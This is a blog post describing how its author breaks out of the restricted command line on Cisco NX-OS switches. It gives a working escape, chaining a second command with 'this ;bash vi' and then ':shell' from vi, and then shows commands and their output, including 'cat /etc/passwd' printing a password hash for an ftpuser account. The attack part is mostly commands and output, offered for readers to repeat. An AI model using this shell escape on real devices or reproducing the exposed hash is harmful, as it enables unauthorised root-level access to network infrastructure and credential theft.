Hacking NX-OS Part 2

You can see in my previous article, that I used the “bash” command.  In later NX-OS versions this was not possible.  After rooting the box, I spent a lot of time learning about all of the shell scripts and binaries on the filesystem, and I continued to hack at them.

What became my “goto” command was “this“.  I think “this” was an undocumented command.  But once you hack into the filesystem you could see it was a command that was available.

The most common hack I would do was to do like so:

this ;bash vi

and then just use :shell from within vi……..this gives you a shell, you can look around and do whatever you like.

When doing shells from within NX-OS, you may not end up with an interactive shell, so you must redirect to your tty to see the output like so:

 

df > /dev/pts/0
Filesystem           1k-blocks      Used Available Use% Mounted on
/dev/pssblkdrv           59493       214     56207   1% /data_store
none                    409600    158696    250904  39% /isan
none                    102400      164    102236   1% /var/tmp
none                    153600        0    153600   0% /var/sysmgr
none                    307200    25748    281452   9% /var/sysmgr/ftp
none                    204800     3936    200864   2% /dev/shm
none                     61440        8     61432   1% /volatile
none                      2048         0      2048   0% /debug
/dev/hd-cfg0             19564      1145     17409   7% /mnt/cfg/0
/dev/hd-cfg1             19317      1145     17175   7% /mnt/cfg/1
/dev/hd-pss              19580      2826     15743  16% /mnt/pss
/dev/hd-bootflash       181724     94174     78168  55% /bootflash
127.1.2.2:/mnt/cf/partner
186683    13960    163085   8% /modflash_2-1

id > /dev/pts/0
uid=2002(admin) gid=503(network-admin) groups=503(network-admin)

uname -a > /dev/pts/0
Linux MDS4 2.4.20_mvl31-cpci735 #1 Wed Dec 16 15:50:36 PST 2009 i686 unknown

cat /etc/passwd > /dev/pts/0
root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm

This entry was posted in Cisco, Network Technology, Nexus, NX-OS and tagged , . Bookmark the permalink.

Leave a Reply